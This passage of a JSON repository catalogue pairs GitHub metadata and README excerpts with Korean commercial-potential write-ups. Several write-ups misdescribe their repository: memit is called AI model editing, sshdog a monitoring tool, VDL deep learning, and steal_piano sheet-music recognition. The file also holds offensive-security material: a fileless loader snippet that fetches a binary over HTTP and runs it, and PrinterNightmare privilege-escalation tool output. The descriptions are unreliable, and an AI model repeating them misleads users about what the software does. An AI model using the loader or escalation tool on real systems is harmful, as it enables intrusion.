","composite_score":0.5015,"license_safety_tag":"safe"},{"name":"Matir/sshdog","github_url":"https://github.com/Matir/sshdog","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":30,"description":"# Matir/sshdog 상용화 분석\n\n## 왜 보물인가\n서버 접속 기록을 자동으로 감시하고 의심스러운 활동을 탐지하는 보안 감시견 역할을 하는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 호스팅 업체의 SaaS 보안 서비스**: 고객의 서버 접속을 모니터링하는 추가 기능으로 판매\n2. **기업 내부 IT 관리 도구**: 직원의 서버 접속 이","readme_excerpt":"# SSHDog\n\nSSHDog is your go-anywhere lightweight SSH server.  Written in Go, it aims\nto be a portable SSH server that you can drop on a system and use for remote\naccess without any additional configuration.\n\nUseful for:\n\n* Tech support\n* Backup SSHD\n* Authenticated remote bind shells\n\nSupported features:\n\n* Windows & Linux\n* Configure port, host key, authorized keys\n* Pubkey authentication (no passwords)\n* Port forwarding\n* SCP (but no SFTP support)\n\nExample usage:\n\n```\n% go build .\n% ssh-keygen -t rsa -b 2048 -N '' -f config/ssh_host_rsa_key\n% echo 2222 > config/port\n% cp ~/.ssh/id_rsa.pub config/authorized_keys\n% rice append --exec sshdog\n% ./sshdog\n[DEBUG] Adding hostkey file: ssh_host_rsa_key\n[DEBUG] Adding authorized_keys.\n[DEBUG] Listening on :2222\n[DEBUG] Waiting for shutdown.\n[DEBUG] select...\n```\n\nAuthor: David Tomaschik <dwt@google.com>\n\n*This is not a Google product, merely code that happens to be owned by Google.*\n\n\n\n","composite_score":0.5015,"license_safety_tag":"safe"},{"name":"vipshop/vdl","github_url":"https://github.com/vipshop/vdl","stars":9,"language":"Go","license":"Apache-2.0","abandonment_months":91,"description":"# VDL (Vipshop Deep Learning) 평가 리포트\n\n## 왜 보물인가\n대형 전자상거래 기업이 실제 운영 경험을 바탕으로 만든 머신러닝 도구로, 상품 추천과 이미지 분석 같은 온라인 쇼핑 문제를 자동으로 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **전자상거래 플랫폼**: 쇼핑몰 고객에게 맞춤 상품 추천 시스템\n- **이미지 기반 검","readme_excerpt":"# VDL\nVDL(Vip Distributed Log)的是一款基于Raft一致性算法的高吞吐、低延时的分布式日志存储系统。\n\n## 1.简介\n\nVDL(Vip Distributed Log)的定位是：高吞吐、低延时的分布式日志存储，多副本、强一致性是其关键的特征。\n这里的Log不是指syslog或者log4j产生的用于跟踪或者问题分析的应用程序日志。Log贯穿于互联网企业应用开发的方方面面，从DB的存储引擎、DB的复制、分布式一致性算法到消息系统。本质上都是Log的存储和分发。\n从应用场景来看，VDL的应用包含下面三类：\n\n* 复制状态机（Replicated State Machine） - 这一类应用主要使用VDL作为事务日志。\n比如用于存储MySQL的Binlog，形成统一的Binlog服务层，简化数据库的备份、恢复、实例重建、failover等高频流程。\n* 消息队列、消息发布订阅、流计算 - 这一类应用主要使用VDL来存储和传递消息。\n我们可以基于VDL实现消息发布/订阅系统；同时也可以作为Storm/Spark的输入和输出，用于实时流计算的场景。\n* 数据复制 - 这一类应用主要使用VDL来进行数据的复制。这个数据复制可能发生在本地机房，也可能是跨机房。\n我们可以基于VDL构建我们强一致的数据库技术方案。\n\n**外部应用通过Kafka协议来发送数据到VDL，VDL通过Raft协议来保证数据的强一致和高可靠。客户端通过Kafka协议来消费VDL中的数据。**\n\n## 2.主要功能\n\n1. 支持kafka协议生产和消费数据。\n2. 数据强一致，raft协议保证。\n3. 保证线性读一致性。\n4. 部署运维简单，不依赖于其他外部组件\n\n## 3.文档\n\n### 3.1 VDL架构设计\n\n[1.VDL架构设计](./docs/vdl_architecture.md)\n\n[2.VDL性能测试](./docs/vdl_test.md)\n\n[3.兼容kafka协议说明](./docs/kafka_protocol.md)\n\n[4.VDL监控指标](./docs/vdl_metrics.md)\n\n### 3.2 VDL部署与运维\n\n[1.VDL的安装与部署](./docs/install_and_depoy.md)\n\n[2.VDL的snapshot操作](./do","composite_score":0.5015,"license_safety_tag":"safe"},{"name":"MegviiRobot/TransMVSNet","github_url":"https://github.com/MegviiRobot/TransMVSNet","stars":18,"language":"Python","license":"MIT","abandonment_months":40,"description":"# TransMVSNet 상용화 분석\n\n## 왜 보물인가\n스마트폰 사진 여러 장으로 정확한 3D 모형을 자동으로 만드는 기술이라 건축, 게임, VR 산업에서 수백만 달러 규모의 수작업을 대체할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 부동산 중개소용 \"가상 투어 자동 생성 플랫폼\" - 사진 업로드만으로 집의 3D 모형 제작\n2","readme_excerpt":"\n\n# (CVPR2022) TransMVSNet: Global Context-aware Multi-view Stereo Network with Transformers\n\n\n## [Paper](https://openaccess.thecvf.com/content/CVPR2022/papers/Ding_TransMVSNet_Global_Context-Aware_Multi-View_Stereo_Network_With_Transformers_CVPR_2022_paper.pdf) | [Project Page](https://dingyikang.github.io/transmvsnet.github.io/) | [Arxiv](https://arxiv.org/abs/2111.14600/) | [Models](https://drive.google.com/drive/folders/1ZJ9bx9qZENEoXv5i5izKCNszlaCNBMkJ?usp=sharing/)\n\n**Tips**: If you meet any problems when reproduce our results, please contact Yikang Ding (dyk20@mails.tsinghua.edu.cn). We are happy to help you solve the problems and share our experience.\n\n\n## ⚠ Change log\n* 09.2022: Add more detailed instruction of how to reproduce the reported results (see [testing-on-dtu](#-testing-on-dtu)).\n* 09.2022: Fix the bugs in MATLAB evaluation code (remove the debug code).\n* 09.2022: Fix the bug of default fuse parameters of gipuma, which could have a great impact on the final results.\n","composite_score":0.5015,"license_safety_tag":"safe"},{"name":"michelp/postgresql-wheel","github_url":"https://github.com/michelp/postgresql-wheel","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":48,"description":"# PostgreSQL Wheel 저장소 분석\n\n## 왜 보물인가\n데이터베이스 구축을 복잡한 설치 과정 없이 간편하게 시작할 수 있는 사전 구성된 패키지입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 신규 고객이 회원가입 후 즉시 자신의 데이터를 저장할 수 있는 개인 데이터베이스를 자동으로 제공하는 서비스\n2. **내부 업무 도구**: 중","readme_excerpt":"# postgresql-wheel\n\nA Python wheel for Linux containing a complete, self-contained,\nlocally installable PostgreSQL database server.\n\nAll servers run as the Python process user in a local path, so this\nwheel does not require root or sudo privledges.  Databases can be\ninitialized in any directory.\n\nServers can be setup and torn down in test fixtures with no additional\noutside dependencies.\n\nCurrently this wheel only works for most flavors of Linux.\n\nPostgres is compiled in the same \"manylinux\" environments provided by\nthe [cibuildwheel](https://cibuildwheel.readthedocs.io/en/stable/)\ntool using [Github\nActions](https://github.com/michelp/postgresql-wheel/blob/main/.github/workflows/wheels.yml)\nand directly archived into the wheel's \"package_data\".\n\nThe wheel can be installed with pip:\n\n```\n$ pip install postgresql-wheel\n```\n\nPostgres binaries in the package can be found in the directory pointed\nto by the `postgresql.pg_bin` global variable.  Function wrappers\naround all of the postgres b","composite_score":0.5015,"license_safety_tag":"safe"},{"name":"sparrow007/BlurImage","github_url":"https://github.com/sparrow007/BlurImage","stars":9,"language":"Java","license":"Apache-2.0","abandonment_months":65,"description":"# BlurImage 저장소 분석\n\n## 왜 보물인가\n사진이나 영상에서 민감한 정보(얼굴, 번호판 등)를 자동으로 흐릿하게 처리하는 기술로, 개인정보 보호가 중요해지는 시대에 수요가 계속 증가할 것으로 예상됩니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소셜 미디어 콘텐츠 자동 보정 서비스 (유튜브, 틱톡 창작자용 프라이버시 보호 도구)\n-","readme_excerpt":"# BlurImage\n\n\n![blurimagelibrary](https://user-images.githubusercontent.com/22986571/33244355-7f27753e-d31b-11e7-9df1-dbbb90b76e80.jpg)\n\nThis Android Project help you to make your image blur in fastest way \n\n[![Platform](https://img.shields.io/badge/platform-android-blue.svg)](http://developer.android.com/index.html)\n[![API](https://img.shields.io/badge/API-14%2B-blue.svg?style=flat)](https://android-arsenal.com/api?level=14)\n\nUSAGE\n-----\nTo make your imageview blurry in a single line of code, library  using android framework (rendersript) which is most efficient for doing these tasks and  you can grab this library using your Gradle file : \n \n Gradle\n------\n\n#### Step #1. Add the dependency\n\n```\ndependencies {\n    ...\n    Implementation 'com.jackandphantom.android:blurimage:1.2.0'\n}\n```\n\n#### Step #2. Add the below lines on app module build.gradle file.\n\n```groovy\ndefaultConfig {\n    ...\n    renderscriptTargetApi 19\n    renderscriptSupportModeEnabled true\n}\n```\n\nIMPLEMENTATION\n----\nThi","composite_score":0.5015,"license_safety_tag":"safe"},{"name":"goodbigzzz/Cpp_Concurrency_In_Action_2nd-","github_url":"https://github.com/goodbigzzz/Cpp_Concurrency_In_Action_2nd-","stars":8,"language":"","license":"unknown","abandonment_months":59,"description":"# Cpp_Concurrency_In_Action_2nd- 분석\n\n## 왜 보물인가\n프로그래머가 여러 작업을 동시에 처리하는 방법을 배우는 실전 교과서로, 컴퓨터 성능을 최대한 활용하려는 기업들이 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **금융거래 시스템 SaaS**: 수천 건의 거래를 동시에 처리해야 하는 증권사나 은행용 클라우드 ","readme_excerpt":"","composite_score":0.5015,"license_safety_tag":"unknown"},{"name":"wuch15/Fastformer","github_url":"https://github.com/wuch15/Fastformer","stars":15,"language":"Jupyter Notebook","license":"unknown","abandonment_months":45,"description":"# Fastformer 저장소 분석\n\n## 왜 보물인가\n복잡한 계산을 매우 빠르게 처리하는 인공지능 기술로, 대량의 데이터를 실시간으로 분석해야 하는 서비스들의 속도 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **금융 거래 분석 SaaS**: 주식/암호화폐 시세 데이터를 밀리초 단위로 분석하는 실시간 투자 추천 서비스\n2. **이커머스 ","readme_excerpt":"# Fastformer\n\n## Notes from the authors\n\nPytorch/Keras implementation of Fastformer. The keras version only includes the core fastformer attention part. The pytorch version is written in a huggingface transformers style. The jupyter notebooks contain the quickstart codes for text classification on AG's News (without pretrained word embeddings for simplicity), which can be directly run.  We noticed that in our experiments, NOT all tasks need FFNN, residual connection, layer normalization and even position embedding. For example, we find that in news recommendation, it is better to directly use Fastformer without layer normalization and position embedding. However, in Ad CVR prediction, both position embedding and layer normalization are needed.\n\nKeras version: 2.2.4 (may not be compatible with higher versions)\n\nTF version: from 1.12 to 1.15 (may be compatible with lower versions)\n\nPytorch version: 1.6.0 (may be compatible with higher/lower versions)\n\n## Citation\n```\n@article{wu2021fastf","composite_score":0.5015,"license_safety_tag":"unknown"},{"name":"98mprice/PSone.css","github_url":"https://github.com/98mprice/PSone.css","stars":13,"language":"HTML","license":"MIT","abandonment_months":74,"description":"# PSone.css 분석 보고서\n\n## 왜 보물인가\n1990년대 플레이스테이션 1의 향수를 디자인으로 표현한 CSS 도구로, 레트로 게임 감성의 웹사이트를 쉽게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발사 포트폴리오 사이트**: 인디 게임 제작사들이 자신의 작품을 소개하는 웹사이트에 레트로 게임 스타일 적용\n2. **온라인 게임 커","readme_excerpt":"# PSone.css\n![description](https://i.imgur.com/IctX9D2.png \"description\")\n\nPlease feel free to submit a pull request, no matter how small. I love getting them.\n\nAt the moment there's just a CSS file that you can link to:\n```html\n<link rel=\"stylesheet\" type=\"text/css\" href=\"https://cdn.jsdelivr.net/gh/98mprice/PSone.css@master/PSone.min.css\">\n```\nI hope to add some JS eventually to help with progressbars etc.\n\n## Reference\n### Container\nFrom FF7\n```html\n<div class=\"container\">\n  <label class=\"title\">Default</label>\n  <p>Kick! Punch! It's all in the mind.</p>\n</div>\n<div class=\"container dark\">\n  <label class=\"title\">dark</label>\n  <p>You see, the island is the site of a secret nuclear\n   weapons disposal facility.</p>\n</div>\n<div class=\"container light\">\n  <label class=\"title\">light</label>\n  <p>Crash, Crash? Are you there Crash? ... Are you there Crash?</p>\n</div>\n```\n\n### Button\nFrom Tekken 3\n```html\n<button type=\"button\" class=\"btn\">Normal</button>\n<button type=\"button\" class=\"btn pr","composite_score":0.5015,"license_safety_tag":"safe"},{"name":"Labelflow/labelflow","github_url":"https://github.com/Labelflow/labelflow","stars":9,"language":"TypeScript","license":"NOASSERTION","abandonment_months":40,"description":"# Labelflow 상용화 분석\n\n## 왜 보물인가\n사진이나 영상에서 원하는 부분을 표시하고 정리하는 작업을 자동화해주는 도구로, AI 학습에 필요한 데이터 준비 시간을 대폭 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소상공인을 위한 영상 분석 플랫폼(예: 편의점 CCTV 분석, 농장 작물 모니터링)\n- **내부 업무 도","readme_excerpt":"<div id=\"top\"></div>\n\n<br />\n<div align=\"center\">\n   <a href=\"https://github.com/labelflow/labelflow/\">\n    <img alt=\"babel\" src=\"typescript/web/public/static/icon-512x512.png\" width=\"160\">\n  </a>\n\n  <h3 align=\"center\">LabelFlow</h3>\n\n  <p align=\"center\">\n    The open platform for image labeling\n    <br />\n    <a href=\"https://labelflow.ai/\"><strong>Try it now »</strong></a>\n    <br />\n    <br />\n    <a href=\"https://docs.labelflow.ai/\">Explore docs</a>\n    ·\n    <a href=\"https://github.com/labelflow/labelflow/issues/new?assignees=&labels=bug&template=bug_report.md&title=\">Report Bug</a>\n    ·\n    <a href=\"https://labelflow.canny.io/\">Request Feature</a>\n    ·\n    <a href=\"https://discord.gg/sHtanUQA2V\">Join the Community</a>\n  </p>\n</div>\n<br />\n<br />\n\n## About\n\n<img width=\"100%\" alt=\"LabelFlow Screenshot\" src=\"https://czeqiukmkichqmwlshce.supabase.in/storage/v1/object/public/labelflow-images/hero-image.jpg\">\n\n# Visual Data for absolutely everyone\n\nLabelFlow is an open platform for i","composite_score":0.5015,"license_safety_tag":"unknown"},{"name":"sushrut111/cowin-automation-extn","github_url":"https://github.com/sushrut111/cowin-automation-extn","stars":12,"language":"JavaScript","license":"MIT","abandonment_months":57,"description":"# cowin-automation-extn 보물 분석\n\n## 왜 보물인가\nCOVID-19 백신 예약을 자동으로 도와주는 도구로, 수동으로 계속 새로고침해야 하는 번거로움을 완전히 제거할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독형 백신 예약 자동화 플랫폼 (인도 및 유사 국가 대상)\n2. **내부 업무 도구**: 대규모","readme_excerpt":"# Important to note\n\n**IMMEDIATELY STOP USING THIS EXTENSION FOR SEARCHING OR BOOKING VACCINE SLOTS ON COWIN PORTAL - BY CONTINUING TO USE IT YOU ARE VIOLATING THE [TERMS OF SERVICE](https://www.cowin.gov.in/terms-condition) PUBLISHED BY MINISTRY OF HEALTH AND FAMILY WELFARE, GOVERNMENT OF INDIA**\n\n\nThis repository is just a proof of concept and I strongly advise you to NOT use this extension for booking your vaccine slots - doing so, may load the cowin servers and violate the terms of use. You might get yourself blocked from using cowin portal by using this extension. If detected, you may have to face legal actions from cowin portal or the Government Of India.\n\nMake sure you are aware of the \"Terms of Service\" published by Ministry of Health and Family Welfare, Government of India.\nHere are the \"Terms of Service\" published by Ministry of Health and Family Welfare, Government of India: [https://www.cowin.gov.in/terms-condition](https://www.cowin.gov.in/terms-condition)\n\n\n# Disclaimer\nM","composite_score":0.5015,"license_safety_tag":"safe"},{"name":"ggerganov/dot-to-ascii","github_url":"https://github.com/ggerganov/dot-to-ascii","stars":35,"language":"HTML","license":"MIT","abandonment_months":48,"description":"","readme_excerpt":"# dot-to-ascii\n\nTry it here: https://dot-to-ascii.ggerganov.com\n\n![dot-to-ascii](https://i.imgur.com/3WLVWn3.png)\n\n## How it works?\n\n- The [index.html](index.html#L82-L95) page sends XHR requests containing your Graphviz input to the [dot-to-ascii.php](dot-to-ascii.php) script\n- The [dot-to-ascii.php](dot-to-ascii.php#L8) script runs the [Graph::Easy](https://metacpan.org/pod/Graph::Easy) command line tool to produce a text diagram from the provided Graphviz input\n- The result is returned back to [index.html](index.html#L82-L95) where it is displayed in a `<pre>` tag\n\n## API\n\nDot-to-ascii can be easily used in your code by performing https requests to the api.\n\n### Python\n\n```python\nimport requests\n\n\ndef dot_to_ascii(dot: str, fancy: bool = True):\n\n    url = 'https://dot-to-ascii.ggerganov.com/dot-to-ascii.php'\n    boxart = 0\n\n    # use nice box drawing char instead of + , | , -\n    if fancy:\n        boxart = 1\n\n    params = {\n        'boxart': boxart,\n        'src': dot,\n    }\n\n    re","composite_score":0.5015,"license_safety_tag":"safe"},{"name":"bmfe/eros-template","github_url":"https://github.com/bmfe/eros-template","stars":12,"language":"Vue","license":"MIT","abandonment_months":87,"description":"# bmfe/eros-template 분석\n\n## 왜 보물인가\n스마트폰 앱을 한 번의 코딩으로 iOS와 안드로이드 모두에서 동작하도록 만들 수 있는 기술로, 개발 시간과 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **스마트폰 앱 개발 SaaS**: 코딩 없이 앱을 만드는 플랫폼에 이 기술을 탑재하면, 소상공인도 자신의 앱을 쉽게","readme_excerpt":"## eros 主项目地址\n- [https://github.com/bmfe/eros](https://github.com/bmfe/eros)\n\n\n## 介绍\n\n> eros app 快速开发模板，可通过脚手架 eros-cli `init` 指令快速生成。\n\n## 分支介绍\n\n- master (附带着 demo 的完整开发底层)\n- pure (无任何功能的纯净开发模板)\n- source (源码依赖分支 全插件 )\n\n## 场景使用\n\n- 不论您是 `weex/vue` 入门新手还是有过项目经验，我们都极力推荐你先 `init` 带有 `demo` 的版本；\n- 如果您已经使用过 `eros` 开发过 app，就可以直接用 `pure` 版本；\n- **如果你想对项目有高度自定义如`修改 weex sdk 源码`, `自定义 eros 相关功能`，`自定义热更新逻辑`等，请直接 `clone` 我们的 `source` 分支**;\n\nsource 分支使用：\n\n[https://github.com/bmfe/eros-template/tree/source](https://github.com/bmfe/eros-template/tree/source)\n","composite_score":0.5015,"license_safety_tag":"safe"},{"name":"taielab/Taie-Bugbounty-killer","github_url":"https://github.com/taielab/Taie-Bugbounty-killer","stars":10,"language":"","license":"unknown","abandonment_months":67,"description":"# Taie-Bugbounty-killer 분석 보고서\n\n## 왜 보물인가\n보안 취약점을 자동으로 찾아내는 도구로, 기업의 보안 문제를 빠르게 발견하고 수정할 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 애플리케이션 개발사들이 월 구독으로 자신의 서비스 보안을 자동 점검하는 클라우드 도구\n2. **내부 업무 도구**: ","readme_excerpt":"# 👑 Taie-Bugbounty-killer是什么意思? 👑\n\n主要目标是分享一些更快速的刷SRC赏金的自动化挖洞技巧命令和工具协同。使用里面的方法，我们能够快速批量找到可以被利用的子域、api令牌和其它敏感漏洞。\n\n## 摘要\n\n之前许诺给大家的自动化赏金挖洞技巧，现在来了，我不知道你们现在的挖洞方式是什么？我现在的挖洞方式是能用老外的一条命令自动化或者整合自动化我就不手动挨个去信息收集可以挖掘。希望这个系列可以给你们提供一些不一样的挖洞思路技巧。目前一共100条自动化技巧后面会持续更新自动化技巧，只要你自己真的去执行去做，不可能挖不到洞。一个月捡个几百几千饭钱还是可以的。单条技巧不能最大化发挥威力，根据你自己的漏洞挖掘思想去组装合体让他变强！\n\n## 如何成为赏金猎人\n\n- 下面就给大家介绍一下如何成为一名赏金猎人，以及在做赏金猎人悬赏时需要注意的事项。\n\n  - 睡个好觉\n  - 学习漏洞类型(owasp)\n  - 每次专注于一件事\n  - 阅读和练习\n  - 学习如何发现和利用\n  - 了解如何分析网站\n  - 看看别人怎么做（报告）\n  - 学习一门编程语言\n  - 制作自己的脚本\n  - 别着急\n\n当然是一个非常谨慎的建议!还得看你能不能坚持！\n\n# 声明：\n\n**制作翻译由**：**泰阿安全实验室(Taielab)出品**\n\n**原文出自**:https://www.infosecmatter.com/bug-bounty-tips-1/ **这个系列**\n\n**Github**:https://github.com/taielab\n\n**博客**：https://blog.taielab.com\n\n**微信公众号**：\n\n![](weixin.png)\n","composite_score":0.5015,"license_safety_tag":"unknown"},{"name":"liamg/memit","github_url":"https://github.com/liamg/memit","stars":9,"language":"Go","license":"Unlicense","abandonment_months":38,"description":"# memit 저장소 분석\n\n## 왜 보물인가\n인공지능 모델의 특정 정보를 빠르게 수정하거나 업데이트할 수 있는 기술로, 전체 모델을 다시 학습시키지 않고도 지식을 바꿀 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 챗봇 서비스 (SaaS)**\n- 고객사별로 챗봇의 회사 정보나 상품 지식을 실시간으로 수정하고 싶을 때 사용\n- 매번 AI를 처음부","readme_excerpt":"# Memit\n\nExecute a binary from memory, without touching the disk. Linux only.\n\nAvailable as both a Go module and a binary.\n\n![demo](demo.gif)\n\n## Using the Go module\n\nThe `Command()` method takes an `io.Reader`, so you can use it with things like an HTTP response body, a `bytes.Buffer`, etc.\n\nIt provides an `*exec.Cmd` (via `memit.Command(...)`) so you can wire up stdin/out and configure other parameters just like you would with a regular command.\n\n```go\npackage main\n\nimport \"github.com/liamg/memit\"\n\nfunc main() {\n\tresp, _ := http.Get(\"https://.../mybinary\")\n\n\tcmd, _, _ := memit.Command(resp.Body, \"--args\", \"--go\", \"--here\")\n\n\tcmd.Stderr = os.Stderr\n\tcmd.Stdin = os.Stdin\n\tcmd.Stdout = os.Stdout\n\n\t_ = cmd.Run()\n}\n```\n\n## Using the binary\n\nGrab the [latest release](https://github.com/liamg/memit/releases/latest) and run it like this:\n\n```bash\nmemit https://.../mybinary -- # args for the actual binary can be put after the --\n```\n\n\n","composite_score":0.5015,"license_safety_tag":"unknown"},{"name":"RimoChan/steal_piano","github_url":"https://github.com/RimoChan/steal_piano","stars":33,"language":"Python","license":"unknown","abandonment_months":27,"description":"# RimoChan/steal_piano 분석\n\n## 왜 보물인가\n피아노 악보를 자동으로 인식하고 디지털화하는 기술로, 음악 교육과 악보 제작 산업에서 수작업을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음악 교육 플랫폼**: 학생들이 종이 악보를 사진으로 찍으면 자동으로 디지털 악보로 변환해주는 학습 앱\n2. **악보 스캔 서비스**: ","readme_excerpt":"# 【steal piano】GitHub偷情分析工具！\n\n你是否有这样的困扰，有一天你的仓库被很多人加了star，但是你却不知道这些人都是从哪来的？\n\n别担心，**GitHub偷情分析工具**帮你轻松解决问题！\n\n\n## 原理\n\nGitHub偷情分析工具透过分析star的时间以及他们之间的follow关系，可以推测出每个star大概是被谁吸引过来的。\n\n就是把所有仓库的star事件按时间排序，然后看看每个star的三天之内，那个人的follower有没有也来star。\n\n\n## 样例\n\n可以看到每个人直接加星的数量，以及每个人吸引来的间接加星的数量——\n\n```text\nbobby285271 直接: 2 间接: 7\nBeautyYuYanli 直接: 4 间接: 7\nakemimadoka 直接: 1 间接: 7\ncubercsl 直接: 1 间接: 7\nLoRexxar 直接: 1 间接: 7\nmiaotony 直接: 1 间接: 7\nsolstice23 直接: 5 间接: 8\noutloudvi 直接: 2 间接: 8\nVergeDX 直接: 6 间接: 8\nNaville 直接: 1 间接: 8\nLaoshuBaby 直接: 6 间接: 9\nwfjsw 直接: 1 间接: 9\nkagurazakayashi 直接: 1 间接: 10\nCo2333 直接: 5 间接: 10\nkirainmoe 直接: 3 间接: 11\nIr1d 直接: 1 间接: 11\nnekohasekai 直接: 3 间接: 12\nKonano 直接: 1 间接: 12\nmzdluo123 直接: 4 间接: 15\nEnter-tainer 直接: 2 间接: 16\nccloli 直接: 4 间接: 16\nb1f6c1c4 直接: 2 间接: 22\nmemset0 直接: 3 间接: 37\nlz233 直接: 13 间接: 48\nSCLeoX 直接: 14 间接: 49\n```\n\n\n## 可视化\n\n![./img.webp](./img.webp)\n\n\n## 使用方法\n\n首先你需要1个Python3.6以上版本，然后`pip install -r requirements.txt`。\n\n接口是这样——\n\n```python\ndef ember(token, 我, days=365, ","composite_score":0.5014,"license_safety_tag":"unknown"},{"name":"vietzerg/Scrape-Finance-Data-v2","github_url":"https://github.com/vietzerg/Scrape-Finance-Data-v2","stars":12,"language":"Python","license":"MIT","abandonment_months":57,"description":"# Scrape-Finance-Data-v2 평가 리포트\n\n## 왜 보물인가\n금융 데이터를 자동으로 모으는 도구로, 투자 정보를 직접 찾아다니지 않고도 한 곳에서 쉽게 볼 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개인 투자자 앱 (SaaS)**\n- 사용자가 월 구독으로 실시간 주식·암호화폐 데이터를 자동 수집하고 분석받는 서비스\n\n**2. 금융사","readme_excerpt":"# Scrape Financial Data of Vietnamese Listed Companies - Version 2\r\nA standalone package to scrape financial data from listed Vietnamese companies via Vietstock. If you are looking for raw financial data from listed Vietnamese companies, this may help you.\r\n# Table of Contents\r\n- [Recent Changes](#recentchanges)\r\n- [Prerequisites](#prerequisites)\r\n- [Run within Docker Compose](#rundockercompose)\r\n- [Run on Host](#runonhost)\r\n- [Scrape Results](#scraperesults)\r\n- [Debugging and How It Works](#debugging)\r\n- [Limitations and Lessons Learned](#limitations)\r\n- [Disclaimer](#disclaimer)\r\n# Recent Changes <a name=\"recentchanges\"></a>\r\n- **September 2021**: Vietstock has implemented request verification tokens for API requests, making it more difficult to access them. You will have to manually obtain the tokens from your browser (see [this section](#Vietstock-user-cookie-and-verification-tokens)), which may take some time depending on how comfortable you are with the browser's inspection tool.","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"HaujetZhao/color-trace","github_url":"https://github.com/HaujetZhao/color-trace","stars":10,"language":"Python","license":"GPL-2.0","abandonment_months":58,"description":"# color-trace 상용화 분석\n\n## 왜 보물인가\n사진이나 이미지에서 색상을 자동으로 추출해서 디지털 형식으로 변환해주는 도구로, 디자인 작업 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 웹서비스**\n- 브라우저에서 이미지를 업로드하면 색상 팔레트를 자동 생성해주는 온라인 도구\n\n**2. 내부 업무 도구**\n","readme_excerpt":"[Gitee](https://gitee.com/haujet/color-trace)   [GitHub](https://github.com/HaujetZhao/color-trace) \n\n#  Color Trace\n\n> 更新日期：2021 年 8 月 6 日\n\n这是一个将位图描摹为彩色矢量 svg 图片的程序，是一个命令行工具，使用 Python 脚本实现，运行环境 Python3.8+。\n\n## ✨ 效果\n\n以一个字帖图片为例，这是 png 格式的位图（370KB）：\n\n![位图](assets/位图.png)\n\n这是颜色数为 1 的 svg 转换结果，即只有黑色（32KB）：\n\n![矢量图-1颜色](assets/矢量图-1颜色.svg)\n\n颜色数为 3 的 svg 转换结果（190KB）：\n\n![矢量图-3颜色](assets/矢量图-3颜色.svg)\n\n## 📝 原理\n\n它的原理是：\n\n- 先将位图图片的颜色缩减，以 png 为中转格式\n- 将图片按颜色分层\n- 将每一层颜色使用 Potrace 生成矢量 svg 图片\n- 最后将所有颜色的 svg 图片合成为一张彩色的 svg 图片\n\n## 🔨 依赖\n\n为了实现上述的功能，你需要先保证安装有：\n\n- [ImageMagick](https://imagemagick.org/)，用于转换图像格式\n\n- [Potrace](http://potrace.sourceforge.net/)，用于将位图转换为单一颜色矢量图\n\n- [pngquant](https://pngquant.org)，用于缩减颜色（Median-Cut 算法，这是默认使用的算法）\n\n- [pngnq](http://pngnq.sourceforge.net/)，用于缩减颜色（NeuQuant 算法）\n\n  > pngnq 是可选安装，NeuQuant 算法可以生成更多颜色，如果你不去手动选择这个算法，就不需要安装 pngnq\n  >\n  > 因为在 Windows 上安装 pngnq 还需要手动去下载 `libpng13.dll`，太麻烦。懒人就直接不用它了。\n\n> 上述安装的意思是：将那些程序的可执行文件所在的目录添加到系统的环境变量。（如果不懂这句话的意思可以百度学习下，这个太基础，就不讲了）\n\nPython ","composite_score":0.5014,"license_safety_tag":"restricted"},{"name":"Flangvik/DeployPrinterNightmare","github_url":"https://github.com/Flangvik/DeployPrinterNightmare","stars":12,"language":"C#","license":"unknown","abandonment_months":59,"description":"# DeployPrinterNightmare 분석 보고서\n\n## 왜 보물인가\n프린터 보안 취약점을 자동으로 찾아내고 활용할 수 있는 도구로, 기업 IT 보안 감시 시장에서 매우 희귀한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 진단 SaaS**: 기업의 프린터 네트워크 보안 검사를 자동화한 구독형 서비스\n2. **IT 관리 회사 내부 도구","readme_excerpt":"# DeployPrinterNightmare\nC# tool for installing a shared network printer abusing the PrinterNightmare bug to allow other network machines easy privesc!\n\nDiscovered and demonstraited by the one and only [Benjamin Delpy](https://twitter.com/gentilkiwi)\n\n```\nC:\\Users\\Flangvik\\Desktop>FakePrinter.exe 32mimispool.dll 64mimispool.dll EasySystemShell\n[<3] @Flangvik - TrustedSec\n[+] Copying C:\\Windows\\system32\\mscms.dll to C:\\Windows\\system32\\6cfbaf26f4c64131896df8a522546e9c.dll\n[+] Copying 64mimispool.dll to C:\\Windows\\system32\\spool\\drivers\\x64\\3\\6cfbaf26f4c64131896df8a522546e9c.dll\n[+] Copying 32mimispool.dll to C:\\Windows\\system32\\spool\\drivers\\W32X86\\3\\6cfbaf26f4c64131896df8a522546e9c.dll\n[+] Adding printer driver => Generic / Text Only!\n[+] Adding printer => EasySystemShell!\n[+] Setting 64-bit Registry key\n[+] Setting 32-bit Registry key\n[+] Setting '*' Registry key\n```\nYou can then reach the EasySystemShell printer from the same network by hitting the computer it was installed on using ","composite_score":0.5014,"license_safety_tag":"unknown"},{"name":"ricequant/rqalpha-mod-tushare","github_url":"https://github.com/ricequant/rqalpha-mod-tushare","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":98,"description":"# ricequant/rqalpha-mod-tushare 분석\n\n## 왜 보물인가\n주식 시장 데이터를 자동으로 수집하고 투자 전략을 테스트할 수 있는 도구로, 개인 투자자가 복잡한 데이터 수집 없이 